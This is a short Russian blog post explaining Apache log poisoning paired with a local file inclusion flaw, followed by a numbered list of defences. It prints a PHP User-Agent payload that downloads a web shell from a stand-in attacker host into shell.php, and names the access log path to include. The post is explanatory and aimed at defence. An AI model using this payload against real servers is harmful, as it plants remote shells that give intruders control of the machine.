Отравление логов (logs poisoning) это такой хитрый способ пробраться на чужой сервер, используемый хакерами. Апач как правило имеет лог файл, лежащий по стандартному пути (зависит от версии ОС). Читать и писать в этот файл могут те же юзеры, под которыми выполняются скрипты, то есть если хакер допустим нашёл какую-то уязвимость, позволяющую включать локальные файлы, но самого локального файла у него нет, то он может прописать нужный код в лог файл апача и далее запустить его оттуда. Сделать это можно, например прописав в качестве юзерагента коротенький пхп код типа такого:

<?php  fwrite(fopen(‘shell.php’,'w’),  file_get_contents(‘http://www.hacker.com/myshell.txt’)); ?>

Код по идее может быть прописан в любую часть запроса, которая откладывается в лог. После этого хакеру просто надо запустить уязвимый скрипт, указав ему в качестве загружаемого файла лог апача (/var/log/httpd/access_log или что-то подобное) и на сервер будет загружен шелл с хакерского сервера.
Бороться с этим можно многими способами:
1. Не давать читать логи тем юзерам, которые в них пишут. Чревато разными трудно-отлавливаемыми проблемами, поскольку это нестандартная конфигурация для типичного линуксового сервера, то есть в случае проблем, гугление может не помочь.
2. Переименовывать логи и прятать их в нестандартные места.
3. Отравлять логи заранее, прописывая в них <?php exit; ?>, тогда всё что запишут после, не будет выполняться.
4. Каким-то образом, санитайзить то, что пишется в логи, может быть есть какие-то модули для этого.
5. Не использовать сторонние скрипты, писать свой Вордпресс где будет всё одним файлом без include(). :)

Похожие посты